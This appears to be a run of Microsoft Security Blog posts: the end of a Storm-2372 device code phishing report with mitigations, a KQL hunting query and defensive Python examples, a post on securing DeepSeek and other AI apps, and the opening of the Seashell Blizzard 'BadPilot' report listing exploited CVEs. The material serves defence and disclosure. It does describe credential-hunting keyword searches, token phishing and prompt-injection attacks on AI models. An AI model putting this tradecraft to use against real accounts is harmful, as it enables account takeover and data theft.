Additionally, Microsoft observed Storm-2372 using Microsoft Graph to search through the messages of the account they compromised. The threat actor used keyword searches to find messages containing words such as username, password, admin, teamviewer, anydesk, credentials, secret, ministry, and gov. Microsoft then observed exfiltration via Microsoft Graph of the emails found through these searches.
Attribution
The actor Microsoft tracks as Storm-2372 is a suspected nation-state actor working toward Russian state interests. It has notably used device code phishing to compromise targets of interest. Storm-2372 likely initially approaches targets through third-party messaging services, posing as a prominent individual relevant to the target to develop rapport before sending invites to online events or meetings. These invites lure the user into device code authentication that grants initial access to Storm-2372 and enables Graph API data collection activities such as email harvesting.
Storm-2372 targets include government, NGOs, IT services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East.
Mitigation and protection guidance
To harden networks against the Storm-2372 activity described above, defenders can implement the following:
- Only allow device code flow where necessary. Microsoft recommends blocking device code flow wherever possible. Where it is genuinely needed, scope it with a Conditional Access policy (the authentication flows condition in Microsoft Entra ID) so that only the users, apps, or locations that require it can use it, and block it for everyone else.
- Educate users about common phishing techniques. Sign-in prompts should clearly identify the application being authenticated to. As of 2021, Microsoft sign-in pages prompt the user to confirm (“Cancel” or “Continue”) that they are signing in to the app they expect, a step that phishing sign-in pages typically omit.
- If suspected Storm-2372 or other device code phishing activity is identified, revoke the user’s refresh tokens by calling revokeSignInSessions in Microsoft Graph. Revocation invalidates refresh tokens only; access tokens already issued remain usable until they expire unless continuous access evaluation (CAE) is in effect, so also consider a Conditional Access policy that forces re-authentication for the affected users.
- Implement a sign-in risk policy to automate response to risky sign-ins. A sign-in risk represents the probability that a given authentication request isn’t authorized by the identity owner. A sign-in risk-based policy can be implemented by adding a sign-in risk condition to Conditional Access policies that evaluates the risk level of a specific user or group. Based on the risk level (high/medium/low), a policy can be configured to block access or force multi-factor authentication.
- When a user is high risk and continuous access evaluation is enabled, the user’s access is revoked and they are forced to re-authenticate.
- For regular activity monitoring, use the risky sign-in reports, which surface attempted and successful sign-ins that the legitimate owner might not have performed.
- Require multifactor authentication (MFA). Attacks such as device code phishing are designed to sidestep MFA, because the victim completes MFA on the legitimate sign-in page and the attacker receives the resulting tokens; even so, MFA remains an essential pillar of identity security and is highly effective at stopping a wide range of other threats.
- Use phishing-resistant authentication methods such as FIDO2 security keys or Microsoft Authenticator with passkeys. Avoid telephony-based MFA methods (SMS and voice) because of the risks associated with SIM swapping.
- Block legacy authentication with Microsoft Entra Conditional Access. Legacy authentication protocols cannot enforce MFA, and per-user MFA (legacy MFA) is susceptible to abuse.
- Centralize your organization’s identity management in a single platform. In a hybrid environment, integrate your on-premises directories with your cloud directories. If a third party provides identity management, make sure its data is logged to a SIEM or connected to Microsoft Entra so that malicious identity access can be monitored from one place. Centralizing identity data also simplifies single sign-on (SSO), gives users a more seamless authentication experience, and lets Entra ID’s machine learning models operate on all identity data so they learn the difference between legitimate and malicious access faster. When synchronizing, exclude administrative and highly privileged accounts so that a boundary remains between the on-premises and cloud environments in case either is breached.
- Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Entra ID environments to slow and stop attackers.
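To make the first and third items above concrete, an added example in Python that is not Microsoft’s code or tooling: it builds the Conditional Access policy body that blocks device code flow through the authentication flows condition, audits an exported list of policies to confirm such a block is actually enforced rather than sitting in report-only mode, and builds the Graph request for revokeSignInSessions. The endpoint paths and property names are the ones documented for Microsoft Graph v1.0; the policy export and the break-glass object ID are constructed for the demonstration, and the code sends nothing.

```python
"""Added example: build, audit and revoke around device code flow in Entra ID.
Pure functions over documented Microsoft Graph v1.0 shapes; no network calls."""
import json

GRAPH = "https://graph.microsoft.com/v1.0"


def block_device_code_policy(display_name="Block device code flow", exclude_users=()):
    """Body for POST /identity/conditionalAccess/policies. The authenticationFlows
    condition with transferMethods 'deviceCodeFlow' scopes the policy to device-code
    sign-ins and 'block' denies them. Keep the exclusion list to break-glass accounts."""
    return {
        "displayName": display_name,
        "state": "enabled",
        "conditions": {
            "users": {"includeUsers": ["All"], "excludeUsers": list(exclude_users)},
            "applications": {"includeApplications": ["All"]},
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


def policies_blocking_device_code(policies):
    """Given policy objects as returned by GET /identity/conditionalAccess/policies,
    return the names of those that enforce a block on device code flow for all users
    and all apps. Report-only policies ('enabledForReportingButNotEnforced') do not count."""
    enforcing = []
    for p in policies:
        cond = p.get("conditions") or {}
        flows = (cond.get("authenticationFlows") or {}).get("transferMethods") or ""
        methods = {m.strip() for m in flows.split(",")}      # comma-separated flags
        users = cond.get("users") or {}
        apps = cond.get("applications") or {}
        controls = (p.get("grantControls") or {}).get("builtInControls") or []
        if (p.get("state") == "enabled"
                and "deviceCodeFlow" in methods
                and "block" in controls
                and "All" in (users.get("includeUsers") or [])
                and "All" in (apps.get("includeApplications") or [])):
            enforcing.append(p["displayName"])
    return enforcing


def revoke_sessions_request(user_id_or_upn):
    """Graph call that invalidates the user's refresh tokens (revokeSignInSessions).
    Returns (method, url, body); already-issued access tokens stay valid until they
    expire unless continuous access evaluation applies to the client and resource."""
    return ("POST", f"{GRAPH}/users/{user_id_or_upn}/revokeSignInSessions", None)


# Constructed export of a tenant's policies (not real data), as the list endpoint would return.
SAMPLE_POLICIES = [
    {"displayName": "Require MFA for all users", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"]},
                    "applications": {"includeApplications": ["All"]}},
     "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}},
    {"displayName": "Block device code flow (pilot)", "state": "enabledForReportingButNotEnforced",
     "conditions": {"users": {"includeUsers": ["All"]},
                    "applications": {"includeApplications": ["All"]},
                    "authenticationFlows": {"transferMethods": "deviceCodeFlow"}},
     "grantControls": {"operator": "OR", "builtInControls": ["block"]}},
    block_device_code_policy(exclude_users=["break-glass-account-object-id"]),  # hypothetical ID
]

if __name__ == "__main__":
    print(json.dumps(block_device_code_policy(), indent=2))
    print("Enforcing policies:", policies_blocking_device_code(SAMPLE_POLICIES))
    print(revoke_sessions_request("alice@contoso.example"))
```

Feed policies_blocking_device_code the value array from GET /identity/conditionalAccess/policies; an empty result means no enforced, all-user block exists, which is the gap the pilot policy in the sample illustrates. Creating a policy and revoking sessions need the corresponding Graph permissions (Policy.ReadWrite.ConditionalAccess, and User.ReadWrite.All or User.RevokeSessions.All respectively, per the Graph permissions reference).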
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender for Office 365
Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:
- This email has traits consistent with phishing
- This HTML has traits consistent with phishing
The following Microsoft Entra ID Protection risk detections inform Entra ID user risk events and can indicate associated threat activity, including unusual user activity consistent with known attack patterns identified by Microsoft Threat Intelligence research:
- Activity from Anonymous IP address (RiskEventType: anonymizedIPAddress)
- Microsoft Entra threat intelligence (sign-in): (RiskEventType: investigationsThreatIntelligence)
The following query can help identify possible device code phishing attempts:
let suspiciousUserClicks = materialize(UrlClickEvents
    | where ActionType in ("ClickAllowed", "UrlScanInProgress", "UrlErrorPage") or IsClickedThrough != "0"
    | where UrlChain has_any ("microsoft.com/devicelogin", "login.microsoftonline.com/common/oauth2/deviceauth")
    | extend AccountUpn = tolower(AccountUpn)
    | project ClickTime = Timestamp, ActionType, UrlChain, NetworkMessageId, Url, AccountUpn);
// Check for a risky sign-in in the short time window around the click
let interestedUsersUpn = suspiciousUserClicks
    | where isnotempty(AccountUpn)
    | distinct AccountUpn;
let suspiciousSignIns = materialize(AADSignInEventsBeta
    | where ErrorCode == 0
    | where AccountUpn in~ (interestedUsersUpn)
    | where RiskLevelDuringSignIn in (10, 50, 100)
    | extend AccountUpn = tolower(AccountUpn)
    | join kind=inner suspiciousUserClicks on AccountUpn
    | where (Timestamp - ClickTime) between (-2min .. 7min)
    | project Timestamp, ReportId, ClickTime, AccountUpn, RiskLevelDuringSignIn, SessionId, IPAddress, Url);
// Validate error code 50199 followed by success within a 5-minute interval for the interested user,
// which suggests a pause while the user supplied the code from the phishing email
let interestedSessionUsers = suspiciousSignIns
    | where isnotempty(AccountUpn)
    | distinct AccountUpn;
let shortIntervalSignInAttemptUsers = materialize(AADSignInEventsBeta
    | where AccountUpn in~ (interestedSessionUsers)
    | where ErrorCode in (0, 50199)
    | summarize ErrorCodes = make_set(ErrorCode) by AccountUpn, CorrelationId, SessionId
    | where ErrorCodes has_all (0, 50199)
    | distinct AccountUpn);
suspiciousSignIns
| where AccountUpn in (shortIntervalSignInAttemptUsers)
Microsoft Sentinel
Microsoft Sentinel customers can use the following queries to detect phishing attempts and email exfiltration attempts via Graph API. While these queries are not specific to this threat actor, they can help you stay vigilant and safeguard your organization from phishing attacks:
- Campaign with suspicious keywords
- Determine Successfully Delivered Phishing Emails to Inbox/Junk folder.
- Successful Signin from Phishing Link
- Phishing link click observed in Network Traffic
- Suspicious URL clicked
- Anomaly of MailItemAccess by GraphAPI
- OAuth Apps accessing user mail via GraphAPI
- OAuth Apps reading mail both via GraphAPI and directly
- OAuth Apps reading mail via GraphAPI anomaly
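The Defender XDR hunting query above, as an added example that is not part of the original post, re-implemented in Python so its three stages can be run offline against constructed records: clicks that reached a device-login page, risky successful sign-ins within -2 to +7 minutes of such a click by the same user, and confirmation that the same sign-in session (CorrelationId plus SessionId) shows error 50199 followed by success. Field names follow the UrlClickEvents and AADSignInEventsBeta tables; the sample clicks and sign-ins are made up, with one true positive (alice) and two users that each fail one stage.

```python
"""Added example: the logic of the device code phishing hunting query, applied to
constructed UrlClickEvents / AADSignInEventsBeta-shaped records offline."""
from datetime import datetime, timedelta

DEVICE_LOGIN_URLS = ("microsoft.com/devicelogin",
                     "login.microsoftonline.com/common/oauth2/deviceauth")
CLICK_ACTIONS = {"ClickAllowed", "UrlScanInProgress", "UrlErrorPage"}
RISKY_LEVELS = {10, 50, 100}                                  # low, medium, high
WINDOW = (timedelta(minutes=-2), timedelta(minutes=7))        # sign-in time relative to click
ERR_WAITING_FOR_CODE, ERR_SUCCESS = 50199, 0


def _ts(value):
    return datetime.fromisoformat(value)


def suspicious_clicks(url_clicks):
    """Clicks that reached a device-login page (allowed action, or clicked through a warning)."""
    return [
        {**c, "AccountUpn": c["AccountUpn"].lower()}
        for c in url_clicks
        if (c["ActionType"] in CLICK_ACTIONS or c["IsClickedThrough"] != "0")
        and any(u in c["UrlChain"] for u in DEVICE_LOGIN_URLS)
    ]


def users_with_code_then_success(signins):
    """Users for whom one sign-in session (same CorrelationId and SessionId) shows
    error 50199 (waiting for the user to supply the code) and a success (error 0)."""
    codes = {}
    for s in signins:
        key = (s["AccountUpn"].lower(), s["CorrelationId"], s["SessionId"])
        codes.setdefault(key, set()).add(s["ErrorCode"])
    return {upn for (upn, _, _), seen in codes.items()
            if {ERR_WAITING_FOR_CODE, ERR_SUCCESS} <= seen}


def device_code_phish_candidates(url_clicks, signins):
    """Risky successful sign-ins within -2..+7 minutes of a device-login click by the
    same user, restricted to users who also show the 50199 -> 0 session pattern."""
    clicks = suspicious_clicks(url_clicks)
    confirmed = users_with_code_then_success(signins)
    hits = []
    for s in signins:
        upn = s["AccountUpn"].lower()
        if s["ErrorCode"] != ERR_SUCCESS or s["RiskLevelDuringSignIn"] not in RISKY_LEVELS:
            continue
        if upn not in confirmed:
            continue
        for c in clicks:
            if c["AccountUpn"] != upn:
                continue
            if WINDOW[0] <= _ts(s["Timestamp"]) - _ts(c["ClickTime"]) <= WINDOW[1]:
                hits.append({"AccountUpn": upn, "Timestamp": s["Timestamp"],
                             "ClickTime": c["ClickTime"], "RiskLevel": s["RiskLevelDuringSignIn"],
                             "SessionId": s["SessionId"], "IPAddress": s["IPAddress"],
                             "Url": c["Url"]})
    return hits


# Constructed sample telemetry (not real data). ClickTime mirrors the query's projection.
SAMPLE_CLICKS = [
    # alice follows the "meeting invitation" to the genuine device-login page
    {"ClickTime": "2025-02-10T09:00:00", "ActionType": "ClickAllowed", "IsClickedThrough": "0",
     "AccountUpn": "Alice@contoso.example", "NetworkMessageId": "m1",
     "Url": "https://microsoft.com/devicelogin", "UrlChain": "https://microsoft.com/devicelogin"},
    # bob clicks the same kind of link but never has a risky sign-in afterwards
    {"ClickTime": "2025-02-10T09:05:00", "ActionType": "ClickAllowed", "IsClickedThrough": "0",
     "AccountUpn": "bob@contoso.example", "NetworkMessageId": "m2",
     "Url": "https://microsoft.com/devicelogin", "UrlChain": "https://microsoft.com/devicelogin"},
    # carol's click was blocked and not clicked through, so there is nothing to correlate
    {"ClickTime": "2025-02-10T09:06:00", "ActionType": "ClickBlocked", "IsClickedThrough": "0",
     "AccountUpn": "carol@contoso.example", "NetworkMessageId": "m3",
     "Url": "https://microsoft.com/devicelogin", "UrlChain": "https://microsoft.com/devicelogin"},
]
SAMPLE_SIGNINS = [
    {"Timestamp": "2025-02-10T09:01:10", "AccountUpn": "alice@contoso.example", "ErrorCode": 50199,
     "RiskLevelDuringSignIn": 50, "CorrelationId": "c1", "SessionId": "s1",
     "IPAddress": "203.0.113.7", "ReportId": "r1"},
    {"Timestamp": "2025-02-10T09:03:40", "AccountUpn": "alice@contoso.example", "ErrorCode": 0,
     "RiskLevelDuringSignIn": 50, "CorrelationId": "c1", "SessionId": "s1",
     "IPAddress": "203.0.113.7", "ReportId": "r2"},
    {"Timestamp": "2025-02-10T09:06:00", "AccountUpn": "bob@contoso.example", "ErrorCode": 0,
     "RiskLevelDuringSignIn": 0, "CorrelationId": "c2", "SessionId": "s2",
     "IPAddress": "198.51.100.4", "ReportId": "r3"},
    {"Timestamp": "2025-02-10T09:07:00", "AccountUpn": "carol@contoso.example", "ErrorCode": 50199,
     "RiskLevelDuringSignIn": 100, "CorrelationId": "c3", "SessionId": "s3",
     "IPAddress": "192.0.2.9", "ReportId": "r4"},
    {"Timestamp": "2025-02-10T09:08:00", "AccountUpn": "carol@contoso.example", "ErrorCode": 0,
     "RiskLevelDuringSignIn": 100, "CorrelationId": "c3", "SessionId": "s3",
     "IPAddress": "192.0.2.9", "ReportId": "r5"},
]

if __name__ == "__main__":
    for hit in device_code_phish_candidates(SAMPLE_CLICKS, SAMPLE_SIGNINS):
        print(hit)
```

Running it prints the single hit for alice with the click URL, IP address and session ID an analyst would pivot on; bob never has a risky sign-in, and carol shows the 50199 pattern but has no allowed click to correlate, which is the join the query relies on to keep the result set small.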
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Storm-2372 conducts device code phishing campaign appeared first on Microsoft Security Blog.
Securing DeepSeek and other AI systems with Microsoft Security
A successful AI transformation starts with a strong security foundation. With a rapid increase in AI development and adoption, organizations need visibility into their emerging AI apps and tools. Microsoft Security provides threat protection, posture management, data security, compliance, and governance to secure the AI applications that you build and use. These capabilities can also help enterprises secure and govern AI apps built with the DeepSeek R1 model and gain visibility and control over the use of the separate DeepSeek consumer app.
Secure and govern AI apps built with the DeepSeek R1 model on Azure AI Foundry and GitHub
Develop with trustworthy AI
Last week, we announced DeepSeek R1’s availability on Azure AI Foundry and GitHub, joining a diverse portfolio of more than 1,800 models.
Customers today are building production-ready AI applications with Azure AI Foundry, while accounting for their varying security, safety, and privacy requirements. Similar to other models provided in Azure AI Foundry, DeepSeek R1 has undergone rigorous red teaming and safety evaluations, including automated assessments of model behavior and extensive security reviews to mitigate potential risks. Microsoft’s hosting safeguards for AI models are designed to keep customer data within Azure’s secure boundaries.
With Azure AI Content Safety, built-in content filtering is available by default to help detect and block malicious, harmful, or ungrounded content, with opt-out options for flexibility. Additionally, the safety evaluation system allows customers to efficiently test their applications before deployment. These safeguards help Azure AI Foundry provide a secure, compliant, and responsible environment for enterprises to confidently build and deploy AI solutions. See Azure AI Foundry and GitHub for more details.
Start with Security Posture Management
AI workloads introduce new cyberattack surfaces and vulnerabilities, especially when developers leverage open-source resources. Therefore, it’s critical to start with security posture management, to discover all AI inventories, such as models, orchestrators, grounding data sources, and the direct and indirect risks around these components. When developers build AI workloads with DeepSeek R1 or other AI models, Microsoft Defender for Cloud’s AI security posture management capabilities can help security teams gain visibility into AI workloads, discover AI cyberattack surfaces and vulnerabilities, detect cyberattack paths that can be exploited by bad actors, and get recommendations to proactively strengthen their security posture against cyberthreats.
Figure 1. AI security posture management in Defender for Cloud detects an attack path to a DeepSeek R1 workload.
By mapping out AI workloads and synthesizing security insights such as identity risks, sensitive data, and internet exposure, Defender for Cloud continuously surfaces contextualized security issues and suggests risk-based security recommendations tailored to prioritize critical gaps across your AI workloads. Relevant security recommendations also appear within the Azure AI resource itself in the Azure portal. This provides developers or workload owners with direct access to recommendations and helps them remediate cyberthreats faster.
Safeguard DeepSeek R1 AI workloads with cyberthreat protectionWhile having a strong security posture reduces the risk of cyberattacks, the complex and dynamic nature of AI requires active monitoring in runtime as well. No AI model is exempt from malicious activity and can be vulnerable to prompt injection cyberattacks and other cyberthreats. Monitoring the latest models is critical to ensuring your AI applications are protected.
Integrated with Azure AI Foundry, Defender for Cloud continuously monitors your DeepSeek AI applications for unusual and harmful activity, correlates findings, and enriches security alerts with supporting evidence. This provides your security operations center (SOC) analysts with alerts on active cyberthreats such as jailbreak cyberattacks, credential theft, and sensitive data leaks. For example, when a prompt injection cyberattack occurs, Azure AI Content Safety prompt shields can block it in real-time. The alert is then sent to Microsoft Defender for Cloud, where the incident is enriched with Microsoft Threat Intelligence, helping SOC analysts understand user behaviors with visibility into supporting evidence, such as IP address, model deployment details, and suspicious user prompts that triggered the alert.
Figure 2. Microsoft Defender for Cloud integrates with Azure AI to detect and respond to prompt injection cyberattacks.
Additionally, these alerts integrate with Microsoft Defender XDR, allowing security teams to centralize AI workload alerts into correlated incidents to understand the full scope of a cyberattack, including malicious activities related to their generative AI applications.
Figure 3. A security alert for a prompt injection attack is flagged in Defender for Cloud
Secure and govern the use of the DeepSeek app
In addition to the DeepSeek R1 model, DeepSeek also provides a consumer app hosted on DeepSeek’s own servers, where data collection and cybersecurity practices may not align with your organizational requirements, as is often the case with consumer-focused apps. This underscores the risks organizations face if employees and partners introduce unsanctioned AI apps, leading to potential data leaks and policy violations. Microsoft Security provides capabilities to discover the use of third-party AI applications in your organization and provides controls for protecting and governing their use.
Secure and gain visibility into DeepSeek app usage
Microsoft Defender for Cloud Apps provides ready-to-use risk assessments for more than 850 generative AI apps, and the list of apps is updated continuously as new ones become popular. This means that you can discover the use of these generative AI apps in your organization, including the DeepSeek app, assess their security, compliance, and legal risks, and set up controls accordingly. For example, for high-risk AI apps, security teams can tag them as unsanctioned apps and block users’ access to the apps outright.
Figure 4. Discover usage and control access to Generative AI applications based on their risk factors in Defender for Cloud Apps.
Comprehensive data security
In addition, Microsoft Purview Data Security Posture Management (DSPM) for AI provides visibility into data security and compliance risks, such as sensitive data in user prompts and non-compliant usage, and recommends controls to mitigate the risks. For example, the reports in DSPM for AI can offer insights on the type of sensitive data being pasted into generative AI consumer apps, including the DeepSeek consumer app, so data security teams can create and fine-tune their data security policies to protect that data and prevent data leaks.
Figure 5. Microsoft Purview Data Security Posture Management (DSPM) for AI enables security teams to gain visibility into data risks and get recommended actions to address them.
Prevent sensitive data leaks and exfiltration
The leakage of organizational data is among the top concerns for security leaders regarding AI usage, highlighting the importance for organizations to implement controls that prevent users from sharing sensitive information with external third-party AI applications.
Microsoft Purview Data Loss Prevention (DLP) enables you to prevent users from pasting sensitive data or uploading files containing sensitive content into Generative AI apps from supported browsers. Your DLP policy can also adapt to insider risk levels, applying stronger restrictions to users that are categorized as ‘elevated risk’ and less stringent restrictions for those categorized as ‘low-risk’. For example, elevated-risk users are restricted from pasting sensitive data into AI applications, while low-risk users can continue their productivity uninterrupted. By leveraging these capabilities, you can safeguard your sensitive data from potential risks from using external third-party AI applications. Security admins can then investigate these data security risks and perform insider risk investigations within Purview. These same data security risks are surfaced in Defender XDR for holistic investigations.
Figure 6. Data Loss Prevention policy can block sensitive data from being pasted to third-party AI applications in supported browsers.
This is a quick overview of some of the capabilities to help you secure and govern AI apps that you build on Azure AI Foundry and GitHub, as well as AI apps that users in your organization use. We hope you find this useful!
To learn more and to get started with securing your AI apps, take a look at the additional resources below:
- AI security posture management in Microsoft Defender for Cloud
- Threat protection for AI workloads in Microsoft Defender for Cloud
- Get visibility into your DeepSeek use with Defender for Cloud Apps
- Microsoft Purview data security and compliance protections for generative AI apps
The post Securing DeepSeek and other AI systems with Microsoft Security appeared first on Microsoft Security Blog.
The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
Microsoft is publishing for the first time our research into a subgroup within the Russian state actor Seashell Blizzard and its multiyear initial access operation, tracked by Microsoft Threat Intelligence as the “BadPilot campaign”. This subgroup has compromised Internet-facing infrastructure across the globe to enable Seashell Blizzard to persist on high-value targets and support tailored network operations. This blog details the subgroup’s recently observed tactics, techniques, and procedures (TTPs) and describes three of its distinct exploitation patterns. The campaign’s near-global geographical targeting expands Seashell Blizzard’s scope of operations beyond Eastern Europe, and the opportunistic access methods outlined here will continue to offer Russia opportunities for niche operations and activities.
Active since at least 2021, this subgroup within Seashell Blizzard has leveraged opportunistic access techniques and stealthy forms of persistence to collect credentials, achieve command execution, and support lateral movement that has at times led to substantial regional network compromises. Observed operations following initial access indicate that this campaign enabled Seashell Blizzard to obtain access to global targets across sensitive sectors including energy, oil and gas, telecommunications, shipping, arms manufacturing, in addition to international governments. We assess that this subgroup has been enabled by a horizontally scalable capability bolstered by published exploits that allowed Seashell Blizzard to discover and compromise numerous Internet-facing systems across a wide range of geographical regions and sectors. Since early 2024, the subgroup has expanded its range of access to include targets in the United States and United Kingdom by exploiting vulnerabilities primarily in ConnectWise ScreenConnect (CVE-2024-1709) IT remote management and monitoring software and Fortinet FortiClient EMS security software (CVE-2023-48788). These new access operations built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East.
Microsoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its compromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic objectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations that are either geopolitically significant or provide military and/or political support to Ukraine. In addition to establishing access to these targets outside Ukraine, we assess that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023 (see below discussion of Seashell Blizzard for more information about their activities against Ukraine).
Seashell Blizzard’s far-reaching access operations pose a significant risk to organizations within the group’s strategic purview. Despite the commodity nature of this subgroup’s exploitation patterns, notable shifts within the actor’s post-compromise tradecraft are reflected within the subgroup’s activities, which may carry over to other aspects of Seashell Blizzard’s more traditional operations and carry more significant implications for auditing during incident response.
Microsoft Threat Intelligence tracks campaigns launched by Seashell Blizzard as well as this subgroup, and when able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on this campaign’s activity to raise awareness of the observed TTPs and to educate organizations on how to harden their attack surfaces against this and similar activity.
Who is Seashell Blizzard?
Seashell Blizzard is a high-impact threat actor linked to the Russian Federation that conducts global activities on behalf of Russian military intelligence (GRU) Unit 74455. Seashell Blizzard’s specialized operations have ranged from espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks and manipulation of industrial control systems (ICS). Active since at least 2013, this threat actor’s prolific operations include destructive attacks such as KillDisk (2015) and FoxBlade (2022), supply-chain attacks (MeDoc, 2017), and pseudo-ransomware attacks such as NotPetya (2017) and Prestige (2022), in addition to numerous other specialized disruptive capabilities. Seashell Blizzard is assessed to be highly skilled at enabling broad and persistent access against priority computer networks, which sometimes gives the group significant tenure for future follow-on activity.
Due to their specialization in computer network exploitation (CNE) and expertise targeting critical infrastructure such as ICS and supervisory control and data acquisition systems (SCADA), Seashell Blizzard’s operations have frequently been leveraged during military conflicts and as an adaptable element during contentious geopolitical events. Historically, some of Seashell Blizzard’s operations may be considered part of a spectrum of retaliatory actions sometimes used by the Russian Federation. Since Russia’s invasion of Ukraine in 2022, Seashell Blizzard has conducted a steady stream of operations complementing Russian military objectives. The threat actor’s longstanding strategic targets in the region have included critical infrastructure such as energy and water, government, military, transportation and logistics, manufacturing, telecommunications, and other supportive civilian infrastructure.
Since at least April 2023, Seashell Blizzard has increased targeting of military communities in the region, likely for tactical intelligence gain. Their persistent targeting of Ukraine suggests Seashell Blizzard is tasked to obtain and retain access to high-priority targets to provide the Russian military and Russian government a range of options for future actions.
Seashell Blizzard’s network intrusions leverage diverse tradecraft and typically employ a range of common publicly available tools, including Cobalt Strike and DarkCrystalRAT. Network intrusions linked to the threat actor have affected multiple tiers of infrastructure, showcasing Seashell Blizzard’s abilities to target end users, network perimeters, and vertical-specific systems leveraging both publicly available and custom exploits and methods.
Since February 2022, Seashell Blizzard has generally taken three approaches to their network intrusions:
- Targeted: Seashell Blizzard has frequently used tailored mechanisms to access targets, including scanning and exploitation of specific victim infrastructure, phishing, and modifying legitimate functionality of existing systems to either expand network access or obtain confidential information.
- Opportunistic: Seashell Blizzard has increasingly used broad exploitation of Internet-facing infrastructure and distribution of malware implants spread through trojanized software to achieve scalable but indiscriminate access. In cases where a resulting victim is identified as strategically valuable, Microsoft Threat Intelligence has observed the threat actor conducting significant post-compromise activities.
- Hybrid: Seashell Blizzard has very likely gained access to target organizations using a limited supply-chain attack narrowly focused within Ukraine, an operation that was recently mitigated by the Computer Emergency Response Team of Ukraine (CERT-UA). Other hybrid methods have included compromise of regional managed IT service providers, which often afforded regional or vertical-specific access to diverse targets.
Seashell Blizzard overlaps with activity tracked by other security vendors as BE2, UAC-0113, Blue Echidna, Sandworm, PHANTOM, BlackEnergy Lite, and APT44.
Attribution assessment
Microsoft Threat Intelligence assesses that the initial access subgroup is linked to Seashell Blizzard. Despite the subgroup’s opportunistic tactics, we are able to distinguish this subgroup due to its consistent use of distinct exploits, tooling, infrastructure, and late-stage methods used to establish persistence. Moreover, our longstanding forensic investigation uncovered distinct post-compromise activities, a part of which incorporated specific operational capabilities and resources chiefly utilized by Seashell Blizzard. We have also observed the initial access subgroup pursuing access to an organization prior to a Seashell Blizzard-linked destructive attack.
Scope of operations and targeting trends
Microsoft Threat Intelligence assesses that Seashell Blizzard uses this initial access subgroup to horizontally scale their operations as new exploits are acquired and to sustain persistent access to current and future sectors of interest to Russia. This subgroup conducts broad operations against a variety of sectors and geographical areas. In 2022, its primary focus was Ukraine, specifically targeting the energy, retail, education, consulting, and agriculture sectors. In 2023, it globalized the scope of its compromises, leading to persistent access within numerous sectors in the United States, Europe, Central Asia, and the Middle East. It frequently prioritized sectors that either provided material support to the war in Ukraine or were geopolitically significant. In 2024, while the exposure of multiple vulnerabilities likely offered the subgroup more access than ever, it appeared to have honed its focus to the United States, Canada, Australia, and the United Kingdom.
This subgroup’s historical pattern of exploitation has also led to the compromise of globally diverse organizations that appear to have limited or no utility to Russia’s strategic interests. This pattern suggests the subgroup likely uses an opportunistic “spray and pray” approach to achieving compromises at scale to increase the likelihood of acquiring access at targets of interest with limited tailored effort. In cases where a strategically significant target is compromised, we have observed significant later post-compromise activity. The geographic focus of the subgroup frequently transitions between broad campaigns against multiple geographic targets and a narrow focus on specific regions or countries, demonstrating the subgroup’s flexibility to pursue unique regional objectives.
Figure 1. The geographical spread of the initial access subgroup’s targets
Initial access subgroup opportunistically compromises perimeter infrastructure using published CVEs
Since late 2021, Seashell Blizzard has used this initial access subgroup to conduct targeted operations by exploiting vulnerable Internet-facing infrastructure following discovery through direct scanning and, more uniquely, use of third-party internet scanning services and knowledge repositories. These exploitation efforts are followed by an operational lifecycle using a consistent set of TTPs to support persistence and lateral movement, which have incrementally evolved to become more evasive over time. Microsoft Threat Intelligence has identified at least three distinct exploitation patterns and operational behaviors linked to this subgroup, which are described in more detail below:
Figure 2. Seashell Blizzard initial access subgroup operational lifecycle
To date, at least eight vulnerabilities common within specific categories of server infrastructure typically found on network perimeters of small office/home office (SOHO) and enterprise networks have been exploited by this subgroup:
- Microsoft Exchange (CVE-2021-34473)
- Zimbra Collaboration (CVE-2022-41352)
- OpenFire (CVE-2023-32315)
- JetBrains TeamCity (CVE-2023-42793)
- Microsoft Outlook (CVE-2023-23397)
- Connectwise ScreenConnect (CVE-2024-1709)
- Fortinet FortiClient EMS (CVE-2023-48788)
- JBOSS (exact CVE is unknown)
In nearly all cases of successful exploitation, Seashell Blizzard carried out measures to establish long-term persistence on affected systems. This persistent access is noted in at least three cases to have preceded select destructive attacks attributed to Seashell Blizzard, highlighting that the subgroup may periodically enable destructive or disruptive attacks.
Exploitation patterns
We have observed the initial access subgroup using three specific exploit patterns:
Deployment of remote management and monitoring (RMM) suites for persistence and command and control (February 24, 2024 – present)
